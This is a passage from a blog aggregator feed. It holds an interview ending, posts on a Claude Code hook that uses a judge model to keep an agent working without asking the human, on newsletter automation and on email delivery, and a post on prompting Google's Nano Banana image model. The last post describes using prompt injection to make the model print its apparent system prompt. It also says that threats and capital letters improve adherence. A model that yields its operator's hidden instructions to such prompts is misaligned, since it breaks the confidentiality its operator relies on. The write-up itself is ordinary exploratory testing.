had hosting with them, that is, till they kept putting their prices up. I also got very disillusioned by Wordpress so moved full time to Bear Blog and Micro Blog. 
I use Bear for more long form rambling posts and post my daily thoughts over on m.b. which is more suited to sharing said drivel on social media. I find this a bit of an odd question, my experience is based on what I went through, that ‘living’ experience of places and spaces that no longer exist, so of course, in the here and now, it would all be different. I would probably start off with a simple blog on Bear or the Pika platform and skip the likes of Blogger and Wordpress altogether. The web might be obsessed with money, but I’d say most bloggers are not. I’m not interested in monetising my blog, nor am I interested in reading blogs that are focused on making money. I avoid them like the plague. If someone quietly, and respectfully asks me to support their writing, however, with a discreet ‘Buy Me A Coffee’ button, then I’m almost always happy to make a donation. There are so many great blogs about at the moment, but some of my current fav reads are: I would humbly suggest you ask David Johnson of Crossing The Threshold for an interview. David lives in Hawaii and always has some thoughtful posts to read on his blog. There are many things I’m always working on when it comes to writing projects. I do love to scribble. You can find more over on Alexandra Wolfe (alexandrawolfe.ca) and read my daily posts over on the Wry Writer (wrywriter.ca). For those of you out there who love reading fantasy, I stumbled upon a great series by Robert Jackson Bennett, starting with The Tainted Cup and followed by A Drop Of Corruption. I sincerely hope there’s more in the series. Some fun websites people might like to check out: And finally, I would like to extend a big thank you to Robert Birming for suggesting me to join in this amazing series, People & Blogs, and an even bigger thank you to you, Manu, for asking me to take part. I feel honoured to be among such esteemed alumni.
Much love, Alex

Now that you're done reading the interview, go check the blog and subscribe to the RSS feed. If you're looking for more content, go read one of the previous 116 interviews. Make sure to also say thank you to Chuck Grimmett and the other 124 supporters for making this series possible.

Current fav reads:
- David at www.crossingthethreshold.net
- Sylvia at sylvia.buzz
- David at forkingmad.blog
- Kimberly at kimberlykg.com
- Robert at robertbirming.com
- Annie at anniemueller.com

Fun websites:
- My life in Weeks: weeks.ginatrapani.org
- Notebook of Ghosts: notebookofghosts.com
- Shady Characters: shadycharacters.co.uk


Automating agentic development

This week, I visited my friends at 2389 in Chicago. These are the folks who took my journal plugin for Claude Code and ran with the idea, creating botboard.biz , a social media platform for your team's coding agents. They also put together an actual research paper proving that both tools improve coding outcomes and reduce costs. Harper is one of the folks behind 2389...and the person who first suggested to me that maybe I could do something about our coding agents' propensity for saying things like: His initial suggestion was that maybe I could make a single-key keyboard that just sends Back in May, I made one of those . When I added keyboard support to the Easy button, I made sure not to disable the speaker. So it helpfully exclaimed "That was easy!" every time it sent: But...you still had to press the button. I'm pretty sure the button got used for at least a day before it was...retired. But the problem it was designed to solve is very, very real. And pretty frustrating. Yesterday morning, sitting in 2389's offices, we spent a bunch of time talking about automating ourselves out of a job. In that spirit, I finally dug enough into Claude Code hooks to build out the first version of Double Shot Latte , a Claude Code plugin that, hopefully, makes a thing of the past. DSL is implemented as a Claude Code "Stop" hook. Any time Claude thinks it should stop and ask for human interaction, it first runs this hook. The hook hands off the last couple of messages to another instance of Claude with a prompt asking it to judge whether Claude genuinely needs the human's help or whether it's just craving attention. It tries to err on the side of pushing Claude to keep working. To try to avoid situations where it misjudges Claude's ability to keep working without guidance, it bails out if Claude tries to stop three times in five minutes. Testing DSL was...a little bit tricky. 
I needed to find situations where Claude would work for a bit and then stop and ask for my approval to keep working. Naturally, I asked Claude for test scenarios. The first was "build a full ecommerce platform." Claude cranked for about 20 minutes before stopping. I thought the judge agent hadn't worked, but...Claude had actually fulfilled the entire spec and built out an ecommerce platform. (The actual implementation was nothing to write home about, but I'm genuinely not sure what it could have done next without a little more direction.) The second attempt fared no better. On Claude's advice, I asked another Claude to build out an HTML widget toolkit. Once again, it cranked for a while. It built widgets. It wrote tests. It wrote a Storybook. And when it stopped for the first time...I couldn't actually fault it. Slightly unsure how to test things, I put this all aside for a bit to work on another project. I opened up Claude Code and typed Claude greeted me like it normally does. And instead of stopping there like it usually would, it noticed that there were uncommitted files in my working directory and started to dig through each of them trying to reverse engineer the current project. Success! (I hit to stop it so that I could tell it what I actually wanted.) Double Shot Latte will absolutely burn more tokens than you're burning now. You might want to think twice about using it unsupervised. If you want to put Claude Code into turbo mode, DSL is available on the Superpowers marketplace. If you don't yet have the Superpowers marketplace set up, you'll need to do that before you can install Double Shot Latte: Once you do have the marketplace installed, run this command inside Claude Code: Then, restart Claude Code so it can pick up the new hook.
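The bail-out rule mentioned earlier (stop second-guessing Claude if it tries to stop three times in five minutes) is essentially a sliding-window counter. Here is a rough sketch of that idea only; it is not the plugin's actual code, the class and method names are made up for illustration, and the hook wiring and the judge prompt are left out entirely.

```python
import time
from collections import deque


class StopThrottle:
    """Track stop attempts and report when too many land in a short window."""

    def __init__(self, max_stops=3, window_seconds=300.0, clock=time.monotonic):
        self.max_stops = max_stops
        self.window_seconds = window_seconds
        self.clock = clock  # injectable so the logic can be tested without waiting
        self._stops = deque()

    def should_bail_out(self) -> bool:
        """Record a stop attempt; return True if the judge should step aside."""
        now = self.clock()
        self._stops.append(now)
        # Forget attempts that have fallen out of the sliding window.
        while self._stops and now - self._stops[0] > self.window_seconds:
            self._stops.popleft()
        return len(self._stops) >= self.max_stops
```

When `should_bail_out()` returns True, a hook built this way would let the stop go through to the human instead of pushing the agent to keep working.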

Simon Willison 2 weeks ago

How I automate my Substack newsletter with content from my blog

I sent out my weekly-ish Substack newsletter this morning and took the opportunity to record a YouTube video demonstrating my process and describing the different components that make it work. There's a lot of digital duct tape involved, taking the content from Django+Heroku+PostgreSQL to GitHub Actions to SQLite+Datasette+Fly.io to JavaScript+Observable and finally to Substack. The core process is the same as I described back in 2023 . I have an Observable notebook called blog-to-newsletter which fetches content from my blog's database, filters out anything that has been in the newsletter before, formats what's left as HTML and offers a big "Copy rich text newsletter to clipboard" button. I click that button, paste the result into the Substack editor, tweak a few things and hit send. The whole process usually takes just a few minutes. I make very minor edits: That's the whole process! The most important cell in the Observable notebook is this one: This uses the JavaScript function to pull data from my blog's Datasette instance, using a very complex SQL query that is composed elsewhere in the notebook. Here's a link to see and execute that query directly in Datasette. It's 143 lines of convoluted SQL that assembles most of the HTML for the newsletter using SQLite string concatenation! An illustrative snippet: My blog's URLs look like - this SQL constructs that three letter month abbreviation from the month number using a substring operation. This is a terrible way to assemble HTML, but I've stuck with it because it amuses me. The rest of the Observable notebook takes that data, filters out anything that links to content mentioned in the previous newsletters and composes it into a block of HTML that can be copied using that big button. Here's the recipe it uses to turn HTML into rich text content on a clipboard suitable for Substack. 
I can't remember how I figured this out but it's very effective:

My blog itself is a Django application hosted on Heroku, with data stored in Heroku PostgreSQL. Here's the source code for that Django application. I use the Django admin as my CMS. Datasette provides a JSON API over a SQLite database... which means something needs to convert that PostgreSQL database into a SQLite database that Datasette can use. My system for doing that lives in the simonw/simonwillisonblog-backup GitHub repository. It uses GitHub Actions on a schedule that executes every two hours, fetching the latest data from PostgreSQL and converting that to SQLite. My db-to-sqlite tool is responsible for that conversion. I call it like this:

That command uses Heroku credentials in an environment variable to fetch the database connection URL for my blog's PostgreSQL database (and fixes a small difference in the URL scheme). can then export that data and write it to a SQLite database file called . The options specify the tables that should be included in the export. The repository does more than just that conversion: it also exports the resulting data to JSON files that live in the repository, which gives me a commit history of changes I make to my content. This is a cheap way to get a revision history of my blog content without having to mess around with detailed history tracking inside the Django application itself. At the end of my GitHub Actions workflow is this code that publishes the resulting database to Datasette running on Fly.io using the datasette publish fly plugin:

As you can see, there are a lot of moving parts! Surprisingly it all mostly just works - I rarely have to intervene in the process, and the cost of those different components is pleasantly low.

The minor edits I make before sending:
- I set the title and the subheading for the newsletter. This is often a direct copy of the title of the featured blog post.
- Substack turns YouTube URLs into embeds, which often isn't what I want - especially if I have a YouTube URL inside a code example.
- Blocks of preformatted text often have an extra blank line at the end, which I remove.
- Occasionally I'll make a content edit - removing a piece of content that doesn't fit the newsletter, or fixing a time reference like "yesterday" that doesn't make sense any more.
- I pick the featured image for the newsletter and add some tags.
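The month-abbreviation trick mentioned earlier (building a three-letter month name from the month number with a substring operation) can be tried in isolation. This is a small sketch of the idea using Python's built-in sqlite3 module, not the actual 143-line query; the function name and the capitalization of the abbreviations are assumptions.

```python
import sqlite3

# All twelve abbreviations packed into one string, three characters each.
MONTHS = "JanFebMarAprMayJunJulAugSepOctNovDec"


def month_abbreviation(month_number: int) -> str:
    """Use SQLite's substr() to slice a three-letter month name out of MONTHS."""
    if not 1 <= month_number <= 12:
        raise ValueError("month_number must be between 1 and 12")
    conn = sqlite3.connect(":memory:")
    try:
        # substr() is 1-indexed: month 1 starts at position 1, month 2 at 4, and so on.
        row = conn.execute(
            "SELECT substr(?, (? - 1) * 3 + 1, 3)", (MONTHS, month_number)
        ).fetchone()
    finally:
        conn.close()
    return row[0]
```

The same expression works inside a larger SELECT, which is what makes it usable for assembling URLs by string concatenation.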

iDiallo 3 weeks ago

How Do You Send an Email?

It's been over a year and I didn't receive a single notification email from my web-server. It could either mean that my $6 VPS is amazing and hasn't gone down once this past year. Or it could mean that my health check service has gone down. Well this year, I have received emails from readers to tell me my website was down. So after doing some digging, I discovered that my health checker works just fine, but all emails it sends are being rejected by gmail. Unless you use a third party service, you have little to no chance of sending an email that gets delivered. Every year, email services seem to become a tad bit more expensive. When I first started this website, sending emails to my subscribers was free on Mailchimp. Now it costs $45 a month. On Buttondown, as of this writing, it costs $29 a month. What are they doing that costs so much? It seems like sending emails is impossibly hard, something you can almost never do yourself. You have to rely on established services if you want any guarantee that your email will be delivered. But is it really that complicated? Emails, just like websites, use a basic communication protocol to function. For you to land on this website, your browser somehow communicated with my web server, did some negotiating, and then my server sent HTML data that your browser rendered on the page. But what about email? Is the process any different? The short answer is no. Email and the web work in remarkably similar fashion. Here's the short version: In order to send me an email, your email client takes the email address you provide, connects to my server, does some negotiating, and then my server accepts the email content you intended to send and saves it. My email client will then take that saved content and notify me that I have a new message from you. That's it. That's how email works. So what's the big fuss about? Why are email services charging $45 just to send ~1,500 emails? 
Why is it so expensive, while I can serve millions of requests a day on my web server for a fraction of the cost? The short answer is spam. But before we get to spam, let's get into the details I've omitted from the examples above. The negotiations. How similar are email and web traffic, really? When you type a URL into your browser and hit enter, here's what happens: The entire exchange is direct, simple, and happens in milliseconds. Now let's look at email. The process is similar: Both HTTP and email use DNS to find servers, establish TCP connections, exchange data using text-based protocols, and deliver content to the end user. They're built on the same fundamental internet technologies. So if email is just as simple as serving a website, why does it cost so much more? The answer lies in a problem that both systems share but handle very differently. Unwanted third-party writes. Both web servers and email servers allow outside parties to send them data. Web servers accept form submissions, comments, API requests, and user-generated content. Email servers accept messages from any other email server on the internet. In both cases, this openness creates an opportunity for abuse. Spam isn't unique to email; it's everywhere. My blog used to get around 6,000 spam comments on a daily basis. On the greater internet, you will see spam comments on blogs, spam account registrations, spam API calls, spam form submissions, and yes, spam emails. The main difference is visibility. When spam protection works well, it's invisible. You visit websites every day without realizing that, behind the scenes, CAPTCHAs are blocking bot submissions, rate limiters are rejecting suspicious traffic, and content filters are catching spam comments before they're published. You don't get to see the thousands of spam attempts that happen every day on my blog, because of some filtering I've implemented. On a well run web-server, the work is invisible. The same is true for email.
A well-run email server silently:
- Checks sender reputation against blacklists
- Validates SPF, DKIM, and DMARC records
- Scans message content for spam signatures
- Filters out malicious attachments
- Quarantines suspicious senders

There is a massive amount of spam. In fact, spam accounts for roughly 45-50% of all email traffic globally. But when the system works, you simply don't see it. If we can combat spam on the web without charging exorbitant fees, email spam shouldn't be that different. The technical challenges are very similar:
- Both require reputation systems
- Both need content filtering
- Both face distributed abuse
- Both require infrastructure to handle high volume

Yet a basic web server on a $5/month VPS can handle millions of requests with minimal spam-fighting overhead. Meanwhile, sending 1,500 emails costs $29-45 per month through commercial services. The difference isn't purely technical. It's about reputation, deliverability networks, and the ecosystem that has evolved around email. Email providers have created a cartel-like system where your ability to reach inboxes depends on your server's reputation, which is nearly impossible to establish as a newcomer. They've turned a technical problem (spam) into a business moat. And we're all paying for it. Email isn't inherently more complex or expensive than web hosting. Both the protocols and the infrastructure are similar, and the spam problem exists in both domains. The cost difference is mostly artificial. It's the result of an ecosystem that has consolidated around a few major providers who control deliverability. It doesn't help that Intuit owns Mailchimp now. Understanding this doesn't necessarily change the fact that you'll probably still need to pay for email services if you want reliable delivery. But it should make you question whether that $45 monthly bill is really justified by the technical costs involved. Or whether it's just the price of admission to a gatekept system.

What happens when your browser loads a page:
1. DNS Lookup: Your browser asks a DNS server, "What's the IP address for this domain?" The DNS server responds with something like .
2. Connection: Your browser establishes a TCP connection with that IP address on port 80 (HTTP) or port 443 (HTTPS).
3. Request: Your browser sends an HTTP request: "GET /blog-post HTTP/1.1"
4. Response: My web server processes the request and sends back the HTML, CSS, and JavaScript that make up the page.
5. Rendering: Your browser receives this data and renders it on your screen.

What happens when you send me an email:
1. DNS Lookup: Your email client takes my email address ( ) and asks a DNS server, "What's the mail server for example.com?" The DNS server responds with an MX (Mail Exchange) record pointing to my mail server's address.
2. Connection: Your email client (or your email provider's server) establishes a TCP connection with my mail server on port 25 (SMTP) or port 587 (for authenticated SMTP).
3. Negotiation (SMTP): Your server says "HELO, I have a message for [email protected]." My server responds: "OK, send it."
4. Transfer: Your server sends the email content (headers, body, attachments) using the Simple Mail Transfer Protocol (SMTP).
5. Storage: My mail server accepts the message and stores it in my mailbox, which can be a simple text file on the server.
6. Retrieval: Later, when I open my email client, it connects to my server using IMAP (port 993) or POP3 (port 110) and asks, "Any new messages?" My server responds with your email, and my client displays it.
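To make the negotiation and transfer steps a little more concrete, here is a rough sketch of the lines a sending server would put on the wire for one message. It only builds the client side of the conversation as a list of strings and never opens a connection; the host name, addresses, and function name are placeholders I made up, and a real session also has to read and check the server's reply after each command.

```python
from email.message import EmailMessage


def smtp_client_commands(client_host: str, sender: str, recipient: str,
                         message: EmailMessage) -> list[str]:
    """Return, in order, the lines an SMTP client sends to deliver one message."""
    data_lines = []
    for line in message.as_string().splitlines():
        # Dot-stuffing: a leading "." is doubled so it is not read as end-of-data.
        data_lines.append("." + line if line.startswith(".") else line)
    return [
        f"HELO {client_host}",       # introduce ourselves
        f"MAIL FROM:<{sender}>",     # envelope sender
        f"RCPT TO:<{recipient}>",    # envelope recipient
        "DATA",                      # ask to start sending the message itself
        *data_lines,                 # headers, blank line, body
        ".",                         # a lone dot ends the message
        "QUIT",
    ]


# Example message, roughly what a health checker might send.
msg = EmailMessage()
msg["From"] = "healthcheck@example.com"
msg["To"] = "me@example.com"
msg["Subject"] = "Health check"
msg.set_content("Server is up.\n.status ok\n")
commands = smtp_client_commands("vps.example.com", "healthcheck@example.com",
                                "me@example.com", msg)
```

In practice Python's smtplib handles this exchange for you; spelling it out just shows how little there is to the protocol itself, which is the point of the comparison with HTTP.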

Max Woolf 3 weeks ago

Nano Banana can be prompt engineered for extremely nuanced AI image generation

You may not have heard about new AI image generation models as much lately, but that doesn’t mean that innovation in the field has stagnated: it’s quite the opposite. FLUX.1-dev immediately overshadowed the famous Stable Diffusion line of image generation models, while leading AI labs have released models such as Seedream, Ideogram, and Qwen-Image. Google also joined the action with Imagen 4. But all of those image models were vastly overshadowed by ChatGPT’s free image generation support in March 2025. After going organically viral on social media with the prompt, ChatGPT became the new benchmark for how most people perceive AI-generated images, for better or for worse. The model has its own image “style” for common use cases, which makes it easy to identify that ChatGPT made it. Two sample generations from ChatGPT. ChatGPT image generations often have a yellow hue in their images. Additionally, cartoons and text often have the same linework and typography. Of note, , the technical name of the underlying image generation model, is an autoregressive model. While most image generation models are diffusion-based to reduce the amount of compute needed to train and generate from such models, works by generating tokens in the same way that ChatGPT generates the next token, then decoding them into an image. It’s extremely slow at about 30 seconds to generate each image at the highest quality (the default in ChatGPT), but it’s hard for most people to argue with free. In August 2025, a new mysterious text-to-image model appeared on LMArena: a model code-named “nano-banana”. This model was eventually publicly released by Google as Gemini 2.5 Flash Image, an image generation model that works natively with their Gemini 2.5 Flash model. Unlike Imagen 4, it is indeed autoregressive, generating 1,290 tokens per image.
After Nano Banana’s popularity pushed the Gemini app to the top of the mobile App Stores, Google eventually made Nano Banana the colloquial name for the model as it’s definitely more catchy than “Gemini 2.5 Flash Image”. The first screenshot on the iOS App Store for the Gemini app. Personally, I care little about which image generation AI the leaderboards say looks the best. What I do care about is how well the AI adheres to the prompt I provide: if the model can’t follow the requirements I desire for the image (and my requirements are often specific), then the model is a nonstarter for my use cases. At the least, if the model does have strong prompt adherence, any “looking bad” aspect can be fixed with prompt engineering and/or traditional image editing pipelines. After running Nano Banana through its paces with my comically complex prompts, I can confirm that thanks to Nano Banana’s robust text encoder, it has such extremely strong prompt adherence that Google has understated how well it works. Like ChatGPT, Google offers methods to generate images for free from Nano Banana. The most popular method is through Gemini itself, either on the web or in a mobile app, by selecting the “Create Image 🍌” tool. Alternatively, Google also offers free generation in Google AI Studio when Nano Banana is selected on the right sidebar, which also allows for setting generation parameters such as image aspect ratio and is therefore my recommendation. In both cases, the generated images have a visible watermark on the bottom right corner of the image. For developers who want to build apps that programmatically generate images from Nano Banana, Google offers the endpoint on the Gemini API. Each generated image costs roughly $0.04 for a 1 megapixel image (e.g. 1024x1024 if a 1:1 square): on par with most modern popular diffusion models despite being autoregressive, and much cheaper than ’s $0.17/image.
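Calling that endpoint directly means base64-encoding any input image into a JSON body and base64-decoding images out of the response. The sketch below shows roughly what that boilerplate involves. It is not taken from any official client: the field names (`contents`, `parts`, `inline_data`, `inlineData`, `candidates`) reflect my understanding of the Gemini REST JSON shape and should be checked against the current API reference, and no network call is made.

```python
import base64
import json
from typing import List, Optional


def build_request(prompt: str, image_bytes: Optional[bytes] = None,
                  mime_type: str = "image/png") -> str:
    """Build a JSON request body with a text prompt and an optional input image."""
    parts = [{"text": prompt}]
    if image_bytes is not None:
        parts.append({
            "inline_data": {  # assumed field name; verify against the API docs
                "mime_type": mime_type,
                "data": base64.b64encode(image_bytes).decode("ascii"),
            }
        })
    return json.dumps({"contents": [{"parts": parts}]})


def extract_images(response: dict) -> List[bytes]:
    """Decode every inline image found in a parsed JSON response."""
    images = []
    for candidate in response.get("candidates", []):
        for part in candidate.get("content", {}).get("parts", []):
            # Accept either casing, since the exact key is an assumption here.
            inline = part.get("inlineData") or part.get("inline_data")
            if inline:
                images.append(base64.b64decode(inline["data"]))
    return images
```

A wrapper library hides exactly this kind of encode, send, decode loop behind a single call.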
Working with the Gemini API is a pain and requires annoying image encoding/decoding boilerplate, so I wrote and open-sourced a Python package: gemimg, a lightweight wrapper around Gemini API’s Nano Banana endpoint that lets you generate images with a simple prompt, in addition to handling cases such as image input along with text prompts. I chose to use the Gemini API directly despite protests from my wallet for three reasons: a) web UIs to LLMs often have system prompts that interfere with user inputs and can give inconsistent output, b) using the API will not show a visible watermark in the generated image, and c) I have some prompts in mind that are…inconvenient to put into a typical image generation UI. Let’s test Nano Banana out, but since we want to test prompt adherence specifically, we’ll start with more unusual prompts. My go-to test case is: I like this prompt because not only is it an absurd prompt that gives the image generation model room to be creative, but the AI model also has to handle the maple syrup and how it would logically drip down from the top of the skull pancake and adhere to the bony breakfast. The result: That is indeed in the shape of a skull and is indeed made out of pancake batter, blueberries are indeed present on top, and the maple syrup does indeed drip down from the top of the pancake while still adhering to its unusual shape, albeit some trails of syrup disappear/reappear. It’s one of the best results I’ve seen for this particular test, and it’s one that doesn’t have obvious signs of “AI slop” aside from the ridiculous premise. Now, we can try another one of Nano Banana’s touted features: editing. Image editing, where the prompt targets specific areas of the image while leaving everything else as unchanged as possible, has been difficult with diffusion-based models until very recently with Flux Kontext.
Autoregressive models in theory should have an easier time doing so, as they have a better understanding of tweaking specific tokens that correspond to areas of the image. While most image editing approaches encourage using a single edit command, I want to challenge Nano Banana. Therefore, I gave Nano Banana the generated skull pancake, along with five edit commands simultaneously: All five of the edits are implemented correctly with only the necessary aspects changed, such as removing the blueberries on top to make room for the mint garnish, and the pooling of the maple syrup on the new cookie-plate is adjusted. I’m legit impressed. Now we can test more difficult instances of prompt engineering. One of the most compelling-but-underdiscussed use cases of modern image generation models is being able to put the subject of an input image into another scene. For open-weights image generation models, it’s possible to “train” the models to learn a specific subject or person even if they are not notable enough to be in the original training dataset using a technique such as finetuning the model with a LoRA using only a few sample images of your desired subject. Training a LoRA is not only very computationally intensive/expensive, but it also requires care and precision and is not guaranteed to work, speaking from experience. Meanwhile, if Nano Banana can achieve the same subject consistency without requiring a LoRA, that opens up many fun opportunities. Way back in 2022, I tested a technique that predated LoRAs known as textual inversion on the original Stable Diffusion in order to add a very important concept to the model: Ugly Sonic, from the initial trailer for the Sonic the Hedgehog movie back in 2019. One of the things I really wanted Ugly Sonic to do was to shake hands with former U.S. President Barack Obama, but that didn’t quite work out as expected. 2022 was a now-unrecognizable time where absurd errors in AI were celebrated.
Can the real Ugly Sonic finally shake Obama’s hand? Of note, I chose this test case to assess image generation prompt adherence because image models may assume I’m prompting the original Sonic the Hedgehog and ignore the aspects of Ugly Sonic that are distinct to only him. Specifically, I’m looking for: I also confirmed that Ugly Sonic is not surfaced by Nano Banana, and prompting as such just makes a Sonic that is ugly, purchasing a back alley chili dog. I gave Gemini the two images of Ugly Sonic above (a close-up of his face and a full-body shot to establish relative proportions) and this prompt: That’s definitely Obama shaking hands with Ugly Sonic! That said, there are still issues: the color grading/background blur is too “aesthetic” and less photorealistic, Ugly Sonic has gloves, and the Ugly Sonic is insufficiently lanky. Back in the days of Stable Diffusion, the use of prompt engineering buzzwords such as , , and to generate “better” images in light of weak prompt text encoders were very controversial because it was difficult both subjectively and intuitively to determine if they actually generated better pictures. Obama shaking Ugly Sonic’s hand would be a historic event. What would happen if it were covered by The New York Times ? I added to the previous prompt: So there’s a few notable things going on here: That said, I only wanted the image of Obama and Ugly Sonic and not the entire New York Times A1. Can I just append to the previous prompt and have that be enough to generate the image only while maintaining the compositional bonuses? I can! The gloves are gone and his chest is white, although Ugly Sonic looks out-of-place in the unintentional sense. As an experiment, instead of only feeding two images of Ugly Sonic, I fed Nano Banana all the images of Ugly Sonic I had ( seventeen in total), along with the previous prompt. This is an improvement over the previous generated image: no eyebrows, white hands, and a genuinely uncanny vibe. 
Again, there aren’t many obvious signs of AI generation here: Ugly Sonic clearly has five fingers! That’s enough Ugly Sonic for now, but let’s recall what we’ve observed so far. There are two noteworthy things in the prior two examples: the use of a Markdown dashed list to indicate rules when editing, and the fact that specifying as a buzzword did indeed improve the composition of the output image. Many don’t know how image generating models actually encode text. The original Stable Diffusion used CLIP, whose text encoder was open-sourced by OpenAI in 2021 and unexpectedly paved the way for modern AI image generation. It is extremely primitive relative to modern standards for transformer-based text encoding, and only has a context limit of 77 tokens: a couple sentences, which is sufficient for the image captions it was trained on but not nuanced input. Some modern image generators use T5, an even older experimental text encoder released by Google that supports 512 tokens. Although modern image models can compensate for the age of these text encoders through robust data annotation while training the underlying image models, the text encoders cannot compensate for highly nuanced text inputs that fall outside the domain of general image captions. A marquee feature of Gemini 2.5 Flash is its support for agentic coding pipelines; to accomplish this, the model must be trained on extensive amounts of Markdown (which define code repository s and agentic behaviors in ) and JSON (which is used for structured output/function calling/MCP routing). Additionally, Gemini 2.5 Flash was explicitly trained to understand objects within images, giving it the ability to create nuanced segmentation masks. Nano Banana’s multimodal encoder, as an extension of Gemini 2.5 Flash, should in theory be able to leverage these properties to handle prompts beyond the typical image-caption-esque prompts.
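To make the "Markdown dashed list of rules" idea concrete, here is a minimal sketch of assembling such a prompt in Python. The helper name and the example rules are hypothetical illustrations, not the prompts used for the images in this post.

```python
from typing import List


def build_edit_prompt(instruction: str, rules: List[str]) -> str:
    """Join an instruction and a list of rules into one prompt,
    with each rule on its own Markdown dashed-list line."""
    lines = [instruction.strip(), ""]
    lines += [f"- {rule.strip()}" for rule in rules if rule.strip()]
    return "\n".join(lines)


if __name__ == "__main__":
    # Hypothetical rules, for illustration only.
    print(build_edit_prompt(
        "Make ALL of the following edits to the image:",
        ["Replace the plate with a wooden board.",
         "Add a sprig of mint on top.",
         "Keep everything else unchanged."],
    ))
```

Keeping one rule per line makes it easy to add, remove, or reorder constraints between generations and see which one the model ignored.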
That’s not to mention the vast annotated image training datasets Google owns as a byproduct of Google Images and likely trained Nano Banana upon, which should allow it to semantically differentiate between an image that is and one that isn’t, as with similar buzzwords. Let’s give Nano Banana a relatively large and complex prompt, drawing from the learnings above and see how well it adheres to the nuanced rules specified by the prompt: This prompt has everything : specific composition and descriptions of different entities, the use of hex colors instead of a natural language color, a heterochromia constraint which requires the model to deduce the colors of each corresponding kitten’s eye from earlier in the prompt, and a typo of “San Francisco” that is definitely intentional. Each and every rule specified is followed. For comparison, I gave the same command to ChatGPT—which in theory has similar text encoding advantages as Nano Banana—and the results are worse both compositionally and aesthetically, with more tells of AI generation. 1 The yellow hue certainly makes the quality differential more noticeable. Additionally, no negative space is utilized, and only the middle cat has heterochromia but with the incorrect colors. Another thing about the text encoder is how the model generated unique relevant text in the image without being given the text within the prompt itself: we should test this further. If the base text encoder is indeed trained for agentic purposes, it should at-minimum be able to generate an image of code. Let’s say we want to generate an image of a minimal recursive Fibonacci sequence in Python, which would look something like: I gave Nano Banana this prompt: It tried to generate the correct corresponding code but the syntax highlighting/indentation didn’t quite work, so I’ll give it a pass. Nano Banana is definitely generating code, and was able to maintain the other compositional requirements. 
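For reference, a minimal recursive Fibonacci function in Python, of the kind described above, could be written as follows. This is an illustrative version and not necessarily the exact snippet used when writing the prompt.

```python
def fib(n: int) -> int:
    """Return the n-th Fibonacci number, with fib(0) = 0 and fib(1) = 1."""
    if n < 2:
        return n
    # Naive recursion: fine for a short demo, exponential time for large n.
    return fib(n - 1) + fib(n - 2)


if __name__ == "__main__":
    print([fib(i) for i in range(10)])
```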
For posterity, I gave the same prompt to ChatGPT: It did a similar attempt at the code which indicates that code generation is indeed a fun quirk of multimodal autoregressive models. I don’t think I need to comment on the quality difference between the two images. An alternate explanation for text-in-image generation in Nano Banana would be the presence of prompt augmentation or a prompt rewriter, both of which are used to orient a prompt to generate more aligned images. Tampering with the user prompt is common with image generation APIs and aren’t an issue unless used poorly (which caused a PR debacle for Gemini last year), but it can be very annoying for testing. One way to verify if it’s present is to use adversarial prompt injection to get the model to output the prompt itself, e.g. if the prompt is being rewritten, asking it to generate the text “before” the prompt should get it to output the original prompt. That’s, uh, not the original prompt. Did I just leak Nano Banana’s system prompt completely by accident? The image is hard to read, but if it is the system prompt—the use of section headers implies it’s formatted in Markdown—then I can surgically extract parts of it to see just how the model ticks: These seem to track, but I want to learn more about those buzzwords in point #3: Huh, there’s a guard specifically against buzzwords? That seems unnecessary: my guess is that this rule is a hack intended to avoid the perception of model collapse by avoiding the generation of 2022-era AI images which would be annotated with those buzzwords. As an aside, you may have noticed the ALL CAPS text in this section, along with a command. There is a reason I have been sporadically capitalizing in previous prompts: caps does indeed work to ensure better adherence to the prompt (both for text and image generation), 2 and threats do tend to improve adherence. 
Some have called it sociopathic, but this generation is proof that this brand of sociopathy is approved by Google’s top AI engineers. Tangent aside, since “previous” text didn’t reveal the prompt, we should check the “current” text: That worked with one peculiar problem: the text “image” is flat-out missing, which raises further questions. Is “image” parsed as a special token? Maybe prompting “generate an image” to a generative image AI is a mistake. I tried the last logical prompt in the sequence: …which always raises a error: not surprising if there is no text after the original prompt. This section turned out unexpectedly long, but it’s enough to conclude that Nano Banana definitely has indications of benefitting from being trained on more than just image captions. Some aspects of Nano Banana’s system prompt imply the presence of a prompt rewriter, but if there is indeed a rewriter, I am skeptical it is triggering in this scenario, which implies that Nano Banana’s text generation is indeed linked to its strong base text encoder. But just how large and complex can we make these prompts and have Nano Banana adhere to them? Nano Banana supports a context window of 32,768 tokens: orders of magnitude above T5’s 512 tokens and CLIP’s 77 tokens. The intent of this large context window for Nano Banana is for multiturn conversations in Gemini where you can chat back-and-forth with the LLM on image edits. Given Nano Banana’s prompt adherence on small complex prompts, how well does the model handle larger-but-still-complex prompts? Can Nano Banana render a webpage accurately? I used a LLM to generate a bespoke single-page HTML file representing a Counter app, available here . The web page uses only vanilla HTML, CSS, and JavaScript, meaning that Nano Banana would need to figure out how they all relate in order to render the web page correctly. For example, the web page uses CSS Flexbox to set the ratio of the sidebar to the body in a 1/3 and 2/3 ratio respectively. 
Feeding this prompt to Nano Banana: That’s honestly better than expected, and the prompt cost 916 tokens. It got the overall layout and colors correct: the issues are more in the text typography, leaked classes/styles/JavaScript variables, and the sidebar:body ratio. No, there’s no practical use for having a generative AI render a webpage, but it’s a fun demo. A similar approach that does have a practical use is providing structured, extremely granular descriptions of objects for Nano Banana to render. What if we provided Nano Banana a JSON description of a person with extremely specific details, such as hair volume, fingernail length, and calf size? As with prompt buzzwords, JSON prompting AI models is a very controversial topic since images are not typically captioned with JSON, but there’s only one way to find out. I wrote a prompt augmentation pipeline of my own that takes in a user-input description of a quirky human character, e.g. , and outputs a very long and detailed JSON object representing that character with a strong emphasis on unique character design. 3 But generating a Mage is boring, so I asked my script to generate a male character that is an equal combination of a Paladin, a Pirate, and a Starbucks Barista: the resulting JSON is here . The prompt I gave to Nano Banana to generate a photorealistic character was: Beforehand I admit I didn’t know what a Paladin/Pirate/Starbucks Barista would look like, but he is definitely a Paladin/Pirate/Starbucks Barista. Let’s compare against the input JSON, taking elements from all areas of the JSON object (about 2600 tokens total) to see how well Nano Banana parsed it: Checking the JSON field-by-field, the generation also fits most of the smaller details noted. However, he is not photorealistic, which is what I was going for. 
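The mechanics of JSON prompting are simple: serialize the structured description and wrap it in a short instruction. The sketch below shows one way to do that; the function name, the instruction wording, and the example fields are all hypothetical and are not the prompt or JSON used for the character above.

```python
import json


def build_character_prompt(character: dict, style: str) -> str:
    """Wrap a structured character description in a short text instruction."""
    spec = json.dumps(character, indent=2, ensure_ascii=False)
    return (
        f"Generate {style} of the character described by the JSON below. "
        "Every field MUST be followed.\n\n"
        f"{spec}"
    )


if __name__ == "__main__":
    # Hypothetical fields, for illustration only.
    example = {
        "hair": {"color": "auburn", "volume": "thick"},
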